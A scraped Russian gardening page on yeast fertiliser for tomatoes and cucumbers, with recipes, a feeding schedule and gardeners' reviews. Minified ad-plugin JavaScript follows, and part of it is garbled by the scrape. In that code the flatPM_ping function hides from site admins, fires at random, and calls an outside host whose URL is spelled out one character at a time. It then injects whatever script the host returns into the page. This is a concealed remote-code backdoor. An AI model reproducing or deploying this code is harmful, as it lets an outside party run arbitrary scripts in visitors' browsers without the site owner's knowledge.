Куриный помёт значительно усиливает действие дрожжевой закваски благодаря высокой концентрации в своём составе азота, калия, кальция, фосфора

Из дрожжей и картофельной ботвы я готовлю питательный настой, обладающий ещё и инсектицидным действием. 600 г свежей ботвы либо 300 г сухой заливаю 5 л воды, добавляю 100 г свежих дрожжей и настаиваю в тёплом месте 4 часа. Настой процеживаю и использую для опрыскивания овощных грядок.

Настой картофельной ботвы с дрожжами не только подпитывает растения азотом, фосфором и калием, но и отпугивает от них вредителей

Видео: дрожжи — сильное комплексное удобрение для всех растений!

Схема внесения дрожжевой подкормки

В первый раз подкармливают дрожжами томаты и огурцы в возрасте рассады, при формировании 2–3 настоящих листиков. Следующие 2 подкормки проводят спустя неделю-две после пересадки растений в грунт и перед цветением.

Правила и рекомендации внесения дрожжевой подкормки:

  • Перед дрожжеванием необходимо увлажнить почву тёплой водой и провести рыхление.
  • Питательный раствор вносят в прикорневую зону или распыляется над кустом с помощью опрыскивателя, равномерно орошая стебель, внутреннюю и наружную стороны листьев.

При опрыскивании огурцов дрожжевым раствором необходимо смачивать листья с обеих сторон

Отзывы огородников

Попробовал настой (в отдельной ёмкости) с дрожжами + куриный помёт + зола, на лейку (10 л) добавлял 0,5 л. Потом обильно полил под корешок из шланга. Эффектно отреагировали томаты и перцы: стали активно наливаться плоды и расцветать новые кисти. Я доволен. Спасибо за подсказку про дрожжи. Обязательно повторю эту процедуру через месяц.

baton-54

https://da4niku.ru/articles/droggevaya-podkormka

В трёхлитровую банку заливаю 2,6–2,7 л воды без хлора (отстоянной), добавляю 100 г разведённых тёплой водой дрожжей и 0,5 ст. сахара. Накрыв марлей, держу банку в тепле, время от времени взбалтывая содержимое. Раствор (брага) готов, когда закончится брожение. Один стакан развожу в 10 л воды и поливаю растения по 1 л под каждый куст. За лето провела три таких подкормки. В итоге урожай мы получили отменный! Кусты томатов выросли мощные, на плодах не было ожогов, растения легко переносили жару и любую непогоду. Но самым большим удивлением было то, что томаты зрели и радовали нас весь октябрь, несмотря на дожди и холодные ночи. И главное — никакой фитофторы! Конечно, возможно, дело было не только в работе дрожжей. Немалую роль сыграли компост и мульчирование. Но конечный результат принёс огромную радость.

IrinaA

В этом году у меня не удалась рассада томатов, и, уже высадив её в парник, прочитала о дрожжевой подкормке. Решила тут же подкормить, результат превзошёл все ожидания. Рассада сразу позеленела и хорошо пошла в рост. Подкармливала только два раза.

L.Lev2011

https://da4niku.ru/articles/droggevaya-podkormka

Дрожжи используют в качестве удобрения для томатов и огурцов уже очень давно. Они являются не только источником питательных веществ, но и биологическим стимулятором роста и плодообразования. Подкормка дрожжевым раствором позволяет получать крепкие, здоровые урожайные растения. А обогащение витаминной добавки дополнительными органическими веществами положительно скажется на урожайности и вкусовых качествах плодов. Однако нельзя слишком часто использовать такое удобрение, чтобы не обеднить почву и не ослабить растения.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};